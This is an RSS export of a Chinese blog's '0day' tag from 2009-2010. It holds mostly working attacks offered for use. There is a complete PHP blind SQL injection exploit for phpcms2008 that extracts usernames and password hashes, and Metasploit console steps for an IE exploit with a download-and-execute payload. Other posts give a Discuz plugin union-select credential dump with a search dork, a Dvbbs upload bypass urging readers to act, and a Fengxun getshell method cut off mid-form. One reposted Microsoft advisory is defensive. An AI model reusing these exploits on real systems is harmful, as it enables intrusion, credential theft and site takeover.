<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>葡萄树 On The Road --- 我只是一个会操作计算机的民工 &#187; 0day</title>
	<atom:link href="http://www.am82.com/houzan/archives/tag/0day/feed" rel="self" type="application/rss+xml" />
	<link>http://www.am82.com/houzan</link>
	<description>我的时光，停在了你的角落...~</description>
	<lastBuildDate>Wed, 08 Sep 2010 16:13:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>关于最近那个网马0day（CVE-2010-0806）用Metasploit生成方法</title>
		<link>http://www.am82.com/houzan/archives/3910</link>
		<comments>http://www.am82.com/houzan/archives/3910#comments</comments>
		<pubDate>Thu, 11 Mar 2010 14:51:52 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[工具]]></category>
		<category><![CDATA[网马]]></category>

		<guid isPermaLink="false">http://www.am82.com/houzan/?p=3910</guid>
		<description><![CDATA[一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb

二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb

三、启动msfconsole

四、msf >........]]></description>
			<content:encoded><![CDATA[<p>一、下载<a href="http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb">http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb</a></p>
<p>二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb</p>
<p>三、启动msfconsole</p>
<p>四、<span style="color: #ff0000;">msf &gt; use exploit/test/ie</span></p>
<p><span style="color: #ff0000;"> msf exploit(ie) &gt; show optinos</span></p>
<p>回显：</p>
<p>Module options:</p>
<p>Name        Current Setting Required Description<br />
&#8212;-        &#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8211;<br />
SRVHOST     0.0.0.0          yes       The local host to listen on.<br />
SRVPORT     8080             yes       The local port to listen on.<br />
SSL         false            no        Negotiate SSL for incoming connections<br />
SSLVersion SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)<br />
URIPATH                      no        The URI to use for this exploit (default is random)<br />
Exploit target:</p>
<p>Id Name<br />
&#8211; &#8212;-<br />
0   Windows XP SP0-SP3 / IE 6.0 SP0-2 &amp; IE 7.0</p>
<p><span style="color: #ff0000;">msf exploit(ie) &gt; set srvhost 192.168.0.3<br />
</span>srvhost =&gt; 192.168.0.3<br />
<span style="color: #ff0000;">msf exploit(ie) &gt; set srvport 8080</span><br />
srvport =&gt; 8080</p>
<p><span style="color: #ff0000;">msf exploit(ie) &gt; set payload windows/download_exec</span><br />
payload =&gt; windows/download_exec</p>
<p><span style="color: #ff0000;">msf exploit(ie) &gt; set url </span><a href="http://192.168.0.3/demo.exe"><span style="color: #ff0000;">http://192.168.0.3/demo.exe</span></a><br />
url =&gt; <a href="http://192.168.0.3/demo.exe">http://192.168.0.3/demo.exe</a><br />
<span style="color: #ff0000;">msf exploit(ie) &gt; exploit</span><br />
[*] Exploit running as background job.</p>
<p>msf exploit(ie) &gt;<br />
[*] Using URL: <a href="http://192.168.0.3:8080/4rJ0JRSnX55wAY">http://192.168.0.3:8080/4rJ0JRSnX55wAY</a><br />
[*] Server started.</p>
<p>然后打开<a href="http://192.168.0.3:8080/4rJ0JRSnX55wAY">http://192.168.0.3:8080/4rJ0JRSnX55wAY</a>，你就可以看到源码了。</p>
<p>红字是命令，其它的是回显</p>
<p>from：<a href="http://hi.baidu.com/myvbscript/blog/item/c1444edf23fa3e1848540320.html">http://hi.baidu.com/myvbscript/blog/item/c1444edf23fa3e1848540320.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/3910/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>提权0day—Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack</title>
		<link>http://www.am82.com/houzan/archives/3658</link>
		<comments>http://www.am82.com/houzan/archives/3658#comments</comments>
		<pubDate>Thu, 21 Jan 2010 07:58:49 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[提权]]></category>

		<guid isPermaLink="false">http://www.am82.com/houzan/?p=3658</guid>
		<description><![CDATA[Windows 7、Windows 2008、Windows Vista、Windows 2003、Windows XP、Windows 2000、Windows NT4下均可利用，guset权限下也能成功。可应用的地方很多，很好的一个洞。不知微软补丁时会不会顺带补上其他的~

code .......]]></description>
			<content:encoded><![CDATA[<p>Windows 7、Windows 2008、Windows Vista、Windows 2003、Windows XP、Windows 2000、Windows NT4下均可利用，guset权限下也能成功。可应用的地方很多，很好的一个洞。不知微软补丁时会不会顺带补上其他的~</p>
<p>code ：<a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8167/show/external/source/kitrap0d">http://www.metasploit.com/redmine/projects/framework/repository/revisions/8167/show/external/source/kitrap0d</a></p>
<p>from：<a href="http://www.xyzreg.net/blog/read.php?55">http://www.xyzreg.net/blog/read.php?55</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/3658/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[转载]IE新0day漏洞及临时缓解办法</title>
		<link>http://www.am82.com/houzan/archives/3635</link>
		<comments>http://www.am82.com/houzan/archives/3635#comments</comments>
		<pubDate>Mon, 18 Jan 2010 00:26:21 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[IE]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.am82.com/houzan/?p=3635</guid>
		<description><![CDATA[此0day漏洞存在于IE浏览器，且可导致远程代码执行
研究发现Windows 2000 SP4上(以下省去Windows)的IE 5.1 SP4不受此影响；而以下IE版本（无论是32位还是64位）均受此漏洞影响：
2000 SP4上的 IE6 SP1
XP、Server 2003、Vista、Server 2008、7、Server 2008 R2上的IE6、IE7、IE8

此漏洞存在于IE无效的指针引用.......]]></description>
			<content:encoded><![CDATA[<p style="line-height: normal;">此0day漏洞存在于IE浏览器，且可导致远程代码执行<br style="line-height: normal;" />研究发现Windows 2000 SP4上(以下省去Windows)的IE 5.1 SP4不受此影响；而以下IE版本（无论是32位还是64位）均受此漏洞影响：<br style="line-height: normal;" />2000 SP4上的 IE6 SP1<br style="line-height: normal;" />XP、Server 2003、Vista、Server 2008、7、Server 2008 R2上的IE6、IE7、IE8</p>
<p style="line-height: normal;">此漏洞存在于IE无效的指针引用。当对象被删除后，在一定的条件下可以访问无效的指针。在针对此漏洞的攻击里试图访问一个已释放的对象时，可引起IE执行远程代码。<br style="line-height: normal;" />当前，微软已知的利用此漏动的攻击影响有限且有针对性，仅针对IE6。微软并未发现利用此漏洞针对其他版本IE的攻击。微软会继续监视漏洞带来的影响并更新安全通报979352。<br style="line-height: normal;" />另外，已发现的利用此漏洞的攻击可以被DEP(Data Execution Prevention，数据执行保护)阻挠。DEP在IE8中是默认启用的；而在IE7中，用户可手动开启DEP。</p>
<p style="line-height: normal;">手动开启IE7中DEP保护的办法：<br style="line-height: normal;" />1.打开“Internet属性”(从控制面板打开；或打开IE，选择“工具”，再选择“Internet属性”)，切换到“高级”选项卡。<br style="line-height: normal;" />2.选中“启用内存保护帮助减少联机攻击”，重启IE7后生效。</p>
<p style="line-height: normal;">或者你也可以使用微软提供的Fix It工具来针对IE6、IE7启用DEP保护<br style="line-height: normal;" />Fix It微软官方下载地址（单击）：<a style="color: #336666; line-height: 20px; font-size: 14px; text-decoration: none;" href="http://go.microsoft.com/?linkid=9668626">http://go.microsoft.com/?linkid=9668626</a><br style="line-height: normal;" />下载后，按照此工具的向导操作即可。<br style="line-height: normal;" />卸载工具下载地址（单击）：<a style="color: #336666; line-height: 20px; font-size: 14px; text-decoration: none;" href="http://go.microsoft.com/?linkid=9668627">http://go.microsoft.com/?linkid=9668627</a></p>
<p style="line-height: normal;">资料来自: 中国自学网(<a style="color: #336666; line-height: 20px; font-size: 14px; text-decoration: none;" href="http://www.cnzixue.com/">Www.CnZiXue.Com</a>) 详细出处参考：<a style="color: #336666; line-height: 20px; font-size: 14px; text-decoration: none;" href="http://www.cnzixue.com/html/sort/virus/2010/0117/5329.html">http://www.cnzixue.com/html/sort/virus/2010/0117/5329.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/3635/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>动网8.x最新0day</title>
		<link>http://www.am82.com/houzan/archives/2798</link>
		<comments>http://www.am82.com/houzan/archives/2798#comments</comments>
		<pubDate>Thu, 08 Oct 2009 04:33:30 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[动网]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/?p=2798</guid>
		<description><![CDATA[利用的还是IIS的文件名解析漏洞.
影响版本:
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0
注册用户-我的主页-个人空间管理
userspace.asp?sid=0&#38;act=modifyset
然后........]]></description>
			<content:encoded><![CDATA[<p>利用的还是IIS的文件名解析漏洞.<br />
影响版本:<br />
Powered By Dvbbs Version 8.2.0<br />
Powered By Dvbbs Version 8.1.0<br />
Powered By Dvbbs Version 8.0.0<br />
注册用户-我的主页-个人空间管理<br />
userspace.asp?sid=0&amp;act=modifyset<br />
然后编辑CSS风格-文件管理<br />
bbs/Dv_plus/myspace/script/filemange.asp<br />
上传 hacknote.asp;hacknote.jpg<br />
接下来知道了吧<br />
赶快行动吧</p>
<p>from：http://www.abcxd.com/abcxd/abcxdArticle/ASPoday/DvbbsVersion8.html</p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/2798/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>phpcms2008 最新0day &amp; Exp</title>
		<link>http://www.am82.com/houzan/archives/2733</link>
		<comments>http://www.am82.com/houzan/archives/2733#comments</comments>
		<pubDate>Sun, 20 Sep 2009 06:27:39 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[php技术]]></category>
		<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[EXP]]></category>
		<category><![CDATA[phpcms]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/?p=2733</guid>
		<description><![CDATA[漏洞存在于yp/job.php的17-34行，urldecode函数惹的祸，代码如下.......]]></description>
			<content:encoded><![CDATA[<p>来源:My5t3ry</p>
<p>漏洞存在于yp/job.php的17-34行，urldecode函数惹的祸，代码如下：</p>
<p>PHP代码<br />
<code>switch($action)<br />
{<br />
case 'list':<br />
$catid = intval($catid);<br />
$head['keywords'] .= '职位列表';<br />
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];<br />
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];<br />
$templateid = 'job_list';<br />
if($inputtime)<br />
$time = time() - 3600*$inputtime*24;<br />
else $time = 0;<br />
if($time < 0 )$time = 0;<br />
$where = "j.updatetime >= '{$time}' ";<br />
$genre = urldecode($genre);<br />
if($station)$where .= "AND j.station = '{$station}' ";<br />
if($genre)$where .= "AND c.genre = '{$genre}' ";<br />
if(!trim($where))$where = '1';<br />
break;  </p>
<p></code><br />
exp：</p>
<p>PHP代码<br />
<code><?   </p>
<p>if ($argc != 4)<br />
usage ();   </p>
<p>$hostname = $argv [1];<br />
$path = $argv [2];<br />
$userid = $argv [3];<br />
$prefix="phpcms_";<br />
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";<br />
$pos = 1;<br />
$chr = 0;   </p>
<p>function usage ()<br />
{<br />
global $argv;<br />
echo<br />
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".<br />
"\n[+] Author: My5t3ry".<br />
"\n[+] Site  : http://hi.baidu.com/netstart".<br />
"\n[+] Usage : php ".$argv[0]." <hostname>
<path> <userid>".<br />
"\n[+] Ex.   : php ".$argv[0]." localhost /yp 1".<br />
"\n\n";<br />
exit ();<br />
}   </p>
<p>function request ($hostname, $path, $query)<br />
{<br />
$fp = fsockopen ($hostname, 80);   </p>
<p>$request = "GET {$path}/job.php?action=list&#038;inputtime=0&#038;station=4&#038;genre={$query} HTTP/1.1\r\n".<br />
"Host: {$hostname}\r\n".<br />
"Connection: Close\r\n\r\n";   </p>
<p>fputs ($fp, $request);   </p>
<p>while (!feof ($fp))<br />
$reply .= fgets ($fp, 1024);   </p>
<p>fclose ($fp);<br />
return $reply;<br />
}   </p>
<p>function exploit ($hostname, $path, $uid, $fld, $chr, $pos)<br />
{<br />
global $prefix;   </p>
<p>$chr = ord ($chr);   </p>
<p>$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";   </p>
<p>$query = str_replace (" ", "%20", $query);   </p>
<p>$query = str_replace ("'", "%2527", $query);   </p>
<p>$outcode = request ($hostname, $path, $query);   </p>
<p>preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);   </p>
<p>if (strlen (trim ($x [1])) == 0)<br />
return false;<br />
else<br />
return true;<br />
}   </p>
<p>$query = "x%2527";   </p>
<p>$outcode = request ($hostname, $path, $query);   </p>
<p>preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);  </p>
<p>$prefix=$match[1];  </p>
<p>//function lengthcolumns ()<br />
//{<br />
echo "\n--------------------------------------------------------------------------------\n";<br />
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";<br />
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";<br />
echo "\n--------------------------------------------------------------------------------\n";<br />
echo "[~]trying to get pre...\n";  </p>
<p>if ($match[1]) {   </p>
<p>echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n";<br />
}  </p>
<p>else {<br />
die(" Exploit failed...");<br />
}  </p>
<p>echo "[~]trying to get username length...\n";<br />
$exit=0;<br />
$length=0;<br />
$i=0;<br />
while ($exit==0)<br />
{<br />
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";   </p>
<p>$query = str_replace (" ", "%20", $query);   </p>
<p>$query = str_replace ("'", "%2527", $query);   </p>
<p>$outcode = request ($hostname, $path, $query);   </p>
<p>$i++;   </p>
<p>preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);<br />
//echo $outcode;<br />
if ($i>20) {die(" Exploit failed...");}     </p>
<p>if (strlen (trim ($x [1])) != 0) {<br />
$exit=1;<br />
}else{<br />
$exit=0;<br />
}<br />
}   </p>
<p>$length=$i-1;<br />
echo "[+]length -> ".$length;   </p>
<p>//    return $length;<br />
//}   </p>
<p>echo "\n[~]Trying to Crack...";<br />
echo "\n[+]username -> ";   </p>
<p>while ($pos <= $length)<br />
{<br />
$key = "abcdefghijklmnopqrstuvwxyz0123456789";   </p>
<p>if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos))<br />
{<br />
echo $key [$chr];<br />
$chr = -1;<br />
$pos++;<br />
}<br />
$chr++;<br />
}   </p>
<p>$pos = 9;   </p>
<p>echo "\n[+]password(md5) -> ";   </p>
<p>while ($pos <= 24)<br />
{<br />
$key = "abcdef0123456789";<br />
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))<br />
{<br />
echo $key [$chr];<br />
$chr = -1;<br />
$pos++;<br />
}<br />
$chr++;<br />
}   </p>
<p>echo "\n[+]Done!";<br />
echo "\n\n--------------------------------------------------------------------------------";   </p>
<p>?>  </code></p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/2733/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Discuz账号发放插件注入0day</title>
		<link>http://www.am82.com/houzan/archives/2527</link>
		<comments>http://www.am82.com/houzan/archives/2527#comments</comments>
		<pubDate>Fri, 14 Aug 2009 05:44:50 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[php技术]]></category>
		<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Discuz]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/archives/2527</guid>
		<description><![CDATA[来源: 普瑞斯特

Discuz账号发放插件注入0day

插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最........]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:10pt"><span style="color:#333333"><span style="font-family:宋体">来源</span><span style="font-family:Times New Roman">:<a href="http://www.hacksb.cn/post/59.html" target="_blank"> </a></span></span><span style="color: #333399; font-family: 宋体; text-decoration: underline;"><a href="http://www.hacksb.cn/post/59.html" target="_blank">普瑞斯特</a></span><span style="color:#333333; font-family:Times New Roman"><br />
</span></span></p>
<p><span style="color:#333333; font-size:10pt"><span style="font-family:Times New Roman">Discuz</span><span style="font-family:宋体">账号发放插件注入</span><span style="font-family:Times New Roman">0day<br />
</span></span></p>
<p><span style="color:#333333; font-size:10pt"><span style="font-family:宋体">插件名</span><span style="font-family:Times New Roman">:2Fly</span><span style="font-family:宋体">礼品</span><span style="font-family:Times New Roman">(</span><span style="font-family:宋体">序号</span><span style="font-family:Times New Roman">)</span><span style="font-family:宋体">发放系统</span><span style="font-family:Times New Roman"><br />
</span><span style="font-family:宋体">漏洞文件</span><span style="font-family:Times New Roman">:2fly_gift.php<br />
</span><span style="font-family:宋体">版本</span><span style="font-family:Times New Roman">:</span><span style="font-family:宋体">最新版</span><span style="font-family:Times New Roman"><br />
Exp:http://www.xxx.com/2fly_gift.php?pages=content&amp;gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members</span></span></p>
<p><span style="color:#333333; font-size:10pt"><span style="font-family:宋体">搜索引擎特征</span><span style="font-family:Times New Roman">:inurl:2fly_gift.php<br />
</span><span style="font-family:宋体">上图</span><span style="font-family:Times New Roman">:<br />
</span></span></p>
<p><a href="http://www.pcsec.org/upload/2009/8/200908141228238711.png"><img src="http://www.am82.cn/houzan/wp-content/uploads/2009/08/081409_0541_Discuz01.png" border="0" alt="" /></a></p>
<p><a href="http://www.pcsec.org/upload/2009/8/200908141228238711.png"></a><a href="http://www.pcsec.org/upload/2009/8/200908141228366411.png"><img src="http://www.am82.cn/houzan/wp-content/uploads/2009/08/081409_0541_Discuz02.png" border="0" alt="" /></a><span style="color:#333333; font-family:Times New Roman; font-size:10pt"><br />
</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/2527/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>风讯 4.0 SP7 getshell 0day</title>
		<link>http://www.am82.com/houzan/archives/2230</link>
		<comments>http://www.am82.com/houzan/archives/2230#comments</comments>
		<pubDate>Sun, 12 Jul 2009 15:20:20 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[风讯]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/?p=2230</guid>
		<description><![CDATA[发现者：bloodsword、bink，转载请无视
影响版本：<=4.0 sp7，前面的版本没去看，估计也能日。
利用条件，开启了文件上传功能，iis6环境。

漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录
首先注册个账号访........]]></description>
			<content:encoded><![CDATA[<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; word-break: break-all; font: normal normal normal 14px/1.8em 'Times New Roman'; padding: 0px;"><span style="font-family: verdana; line-height: 21px; color: #333333; font-size: 12px;"></p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; word-break: break-all; font: normal normal normal 14px/1.8em 'Times New Roman'; padding: 0px;">发现者：bloodsword、bink，转载请无视<br />
影响版本：&lt;=4.0 sp7，前面的版本没去看，估计也能日。<br />
利用条件，开启了文件上传功能，iis6环境。</p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; word-break: break-all; font: normal normal normal 14px/1.8em 'Times New Roman'; padding: 0px;">漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录<br />
首先注册个账号访问http://www.bbb.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&amp;Type=AddFolder&amp;Path=/userfiles/06150583700/aaa.asp//&amp;CurrPath=/userfiles/06150583700其中这个06150583700是你的userid，登录了直接可以看到，建立一个.asp目录</p>
<p>因为风讯浏览目录的地方也过滤了.，所以建立的子目录进不去。本地构造表单：</p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; word-break: break-all; font: normal normal normal 14px/1.8em 'Times New Roman'; padding: 0px;"><span style="font-family: Consolas; line-height: 13px; font-size: 12px;"></p>
<div class="line alt1" style="outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><span class="content" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 3.3em !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 3px !important; border-style: initial !important; border-color: initial !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: #ffffff !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; border-left-style: solid !important; border-left-color: #6ce26c !important; color: #000000 !important; background-position: initial initial !important;"><span class="block" style="padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: url(http://www.pcsec.org/PLUGIN/Codelight/SyntaxHighlighter/Styles/wrapping.png) !important; background-repeat: no-repeat !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; text-indent: -1.5em !important; background-position: 0px 1.1em !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&lt;</code><code class="keyword" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #006699 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: bold !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">form</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">name</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"FileForm"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">method</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"post"</code> <code 